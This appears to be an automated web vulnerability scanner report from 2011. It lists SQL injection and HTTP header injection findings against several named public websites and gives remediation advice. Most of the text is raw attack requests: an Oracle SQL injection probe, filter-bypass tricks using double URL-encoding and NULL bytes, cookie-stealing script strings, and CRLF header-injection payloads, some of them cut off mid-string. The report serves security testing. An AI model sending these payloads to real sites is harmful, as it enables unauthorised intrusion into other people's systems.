GET /spportal/indexLogin.do HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true'; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;
Response 1 (redirected)
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:29:58 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
GET /spportal/indexLogin.do HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true''; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;
Response 2 (redirected)
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:30:04 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]...
1.18. https://www.supermedia.com/spportal/spportalFlow.do [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
https://www.supermedia.com
Path:
/spportal/spportalFlow.do
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27&1'=1 HTTP/1.1 Host: www.supermedia.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761732|check#true#1296759932; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Response 1
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:20:05 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html;charset=UTF-8 Content-Language: en-US Connection: close Content-Length: 20261
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<!-- UI framework designed and implemented by Advertiser Portal UI Team -->
<title>SuperPages ...[SNIP]... e next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer=""; s.pageName=""; s.prop1="Processing Error Title"; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6="General Exception"; s.prop7="Unable to extract the flow definition id parameter: make sure the client provides the '_flowId' parameter as input or set the 'defaultFlowId' property; the parameters provided in this reque ...[SNIP]...
Request 2
GET /spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27&1''=1 HTTP/1.1 Host: www.supermedia.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761732|check#true#1296759932; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Response 2
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:20:17 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html;charset=UTF-8 Content-Language: en-US Connection: close Content-Length: 19960
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<!-- UI framework designed and implemented by Advertiser Portal UI Team -->
The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the s_sq cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /spportal/spportalFlow.do(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C' HTTP/1.1 Host: www.supermedia.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761701|check#true#1296759901; s_cc=true; s_sq=%5B%5BB%5D%5D%2527; undefined_s=First%20Visit
Response 1 (redirected)
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:06:31 GMT Content-Type: text/html;charset=UTF-8 Connection: close Cache-Control: private Content-Length: 21158
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET / HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%2527
GET / HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%2527%2527
The hl parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the hl parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /?hl=en%00'&tab=w1 HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;
GET /?hl=en%00''&tab=w1 HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;
1.22. http://www.youtube.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.youtube.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /?1'=1 HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /?1''=1 HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The OAVARS[aed03704] cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the OAVARS[aed03704] cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the OAVARS[aed03704] cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /delivery/afr.php?n=aed03704&zoneid=124&cb=70c60a12 HTTP/1.1 Host: www8.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(document.cookie)-%22c17f4a73141=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D%2527; OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=f41efd0364d75038834b62f043c90f9a
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'> <html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'> <head> <ti ...[SNIP]... our system with the leading and award-winning Registry Booster 2011 from Uniblue. Registry Booster 2011 is the safest and most trusted solution to clean and optimize your system, free it from registry errors and fragmented entries. Through Advanced Error Detection Technology, Registry Booster 2011 automatically identifies missing, corrupt, or invalid items in your Windows registry and dramatically enhances performance and general stability </p> ...[SNIP]...
Request 2
GET /delivery/afr.php?n=aed03704&zoneid=124&cb=70c60a12 HTTP/1.1 Host: www8.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(document.cookie)-%22c17f4a73141=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D%2527%2527; OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=f41efd0364d75038834b62f043c90f9a
The n parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the n parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /delivery/afr.php?n=aed03704'&zoneid=124&cb=70c60a12 HTTP/1.1 Host: www8.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(document.cookie)-%22c17f4a73141=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=f41efd0364d75038834b62f043c90f9a
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'> <html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'> <head> <ti ...[SNIP]... <p>Outdated drivers affect your PC...s performance as a result of diminished hardware functionality, making your system vulnerable to errors and crashes. Looking for the right updates, as well as downloading and installing the appropriate drivers can be difficult tasks, which is why DriverScanner 2010 is the simplest of solutions.
<p> ...[SNIP]...
Request 2
GET /delivery/afr.php?n=aed03704''&zoneid=124&cb=70c60a12 HTTP/1.1 Host: www8.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(document.cookie)-%22c17f4a73141=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAVARS[aed03704]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22933%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A3%3A%22124%22%3B%7D; OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=f41efd0364d75038834b62f043c90f9a
The n parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the n parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /delivery/afr.php?n=aed03704%00'&zoneid=124&cb=d302be2a HTTP/1.1 Host: www8.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAID=f41efd0364d75038834b62f043c90f9a
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'> <html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'> <head> <ti ...[SNIP]... <p>Outdated drivers affect your PC...s performance as a result of diminished hardware functionality, making your system vulnerable to errors and crashes. Looking for the right updates, as well as downloading and installing the appropriate drivers can be difficult tasks, which is why DriverScanner 2010 is the simplest of solutions.
<p> ...[SNIP]...
Request 2
GET /delivery/afr.php?n=aed03704%00''&zoneid=124&cb=d302be2a HTTP/1.1 Host: www8.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAID=f41efd0364d75038834b62f043c90f9a
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
2.1. http://102.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://102.xg4ken.com
Path:
/media/redir.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 939d6%0d%0ad29cc9616d1 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=88&camp=4679&affcode=cr197235&cid=7085856551|166328|SmartDraw&mType=e&networkType=search&url[]=http%3A%2F%2Finfo.mindjet.com%2FMindManagerB.html%3Fcmpg%3DAmericas_-_Google_US_Competitors/x22&939d6%0d%0ad29cc9616d1=1 HTTP/1.1 Host: 102.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 20:31:21 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=7f1e123c-7cbf-4f88-c29c-00007fc2381d; expires=Wed, 04-May-2011 20:31:21 GMT; path=/; domain=.xg4ken.com Location: http://info.mindjet.com/MindManagerB.html?cmpg=Americas_-_Google_US_Competitors/x22&939d6 d29cc9616d1=1 P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The value of the url[] request parameter is copied into the Location response header. The payload 15d1e%0d%0ad4b2f64cb5a was submitted in the url[] parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=88&camp=4679&affcode=cr197235&cid=7085856551|166328|SmartDraw&mType=e&networkType=search&url[]=http%3A%2F%2Finfo.mindjet.com%2FMindManagerB.html%3Fcmpg%3DAmericas_-_Google_US_Competitors/x2215d1e%0d%0ad4b2f64cb5a HTTP/1.1 Host: 102.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 20:31:21 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=5768e8a0-3fce-aa69-4351-00001bc16518; expires=Wed, 04-May-2011 20:31:21 GMT; path=/; domain=.xg4ken.com Location: http://info.mindjet.com/MindManagerB.html?cmpg=Americas_-_Google_US_Competitors/x2215d1e d4b2f64cb5a P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The value of the cr request parameter is copied into the Location response header. The payload ae913%0d%0a56b335fe342 was submitted in the cr parameter. This caused a response containing an injected HTTP header.
The value of the src request parameter is copied into the Location response header. The payload 24537%0d%0a2e8dc5adfe9 was submitted in the src parameter. This caused a response containing an injected HTTP header.
Request
GET /getcamphist;src=1513429;host=metrics.apple.com%2Fb%2Fss%2Fappleglobal%2Cappleusipad%2F1%2FH.22.1%2Fs9681528011336%3FAQB%3D1%26vvpr%3Dtrue%26%26ndh%3D1%26t%3D3%252F1%252F2011%252011%253A50%253A27%25204%2520360%26pageName%3Dipad%2520-%2520index%2520%28us%29%26g%3Dhttp%253A%252F%252Fwww.apple.com%252Fipad%252F%26r%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252F%26cc%3DUSD%26vvp%3DDFA%25231513429%253Av46%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dwww.us.ipad%26c4%3Dhttp%253A%252F%252Fwww.apple.com%252Fipad%252F%26c5%3Dwin32%26c6%3D%253A%2520ipad%2520-%2520index%2520%28us%29%26c9%3Dwindows%26c14%3Ditunes%2520-%2520index%2520%28us%29%26c15%3Dno%2520zip%26c17%3Dundefined%253Aundefined%26c18%3Dno%2520quicktime%26c19%3Dflash%252010%26c20%3Dnon-store%2520kiosk%26c44%3Dappleusipad%26c48%3D1%26c49%3DD%253Ds_vi%26c50%3Dipad%253D1%26s%3D1920x1200%26c%3D16%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1037%26bh%3D1012%26p%3DChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.230.5%253BJava%28TM%29%2520Platform%2520SE%25206%2520U23%253BWPI%2520Detector%25201.1%253BGoogle%2520Update%253BSilverlight%2520Plug-In%253BDefault%2520Plug-in%253B%26u%3Dappleglobal%2Cappleitunes%2Cappleusitunesipod%26pid%3Ditunes%2520-%2520index%2520%28us%29%26pidt%3D1%26oid%3Dhttp%253A%252F%252Fwww.apple.com%252Fipad%252F%26ot%3DA%26u%3D0%26AQE%3D124537%0d%0a2e8dc5adfe9&A2S=1;ord=2015452841 HTTP/1.1 Host: ad.br.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.apple.com/ipad/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.0 302 Moved Temporarily Content-Length: 0 Location: http://metrics.apple.com/b/ss/appleglobal,appleusipad/1/H.22.1/s9681528011336?AQB=1&vvpr=true&&ndh=1&t=3%2F1%2F2011%2011%3A50%3A27%204%20360&pageName=ipad%20-%20index%20(us)&g=http%3A%2F%2Fwww.apple.com%2Fipad%2F&r=http%3A%2F%2Fwww.apple.com%2Fitunes%2F&cc=USD&vvp=DFA%231513429%3Av46%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=www.us.ipad&c4=http%3A%2F%2Fwww.apple.com%2Fipad%2F&c5=win32&c6=%3A%20ipad%20-%20index%20(us)&c9=windows&c14=itunes%20-%20index%20(us)&c15=no%20zip&c17=undefined%3Aundefined&c18=no%20quicktime&c19=flash%2010&c20=non-store%20kiosk&c44=appleusipad&c48=1&c49=D%3Ds_vi&c50=ipad%3D1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1037&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava(TM)%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&u=appleglobal,appleitunes,appleusitunesipod&pid=itunes%20-%20index%20(us)&pidt=1&oid=http%3A%2F%2Fwww.apple.com%2Fipad%2F&ot=A&u=0&AQE=124537 2e8dc5adfe9&A2S=1/respcamphist;src=1513429;ec=nh;rch=2;lastimp=0;lastimptime=0;lis=0;lip=0;lic=0;lir=0;lirv=0;likv=0;lipn=;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1296755474
The value of REST URL parameter 1 is copied into the Location response header. The payload 62530%0d%0a230925b8b8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /62530%0d%0a230925b8b8/N3340.scanscout.com/B4852812.30 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
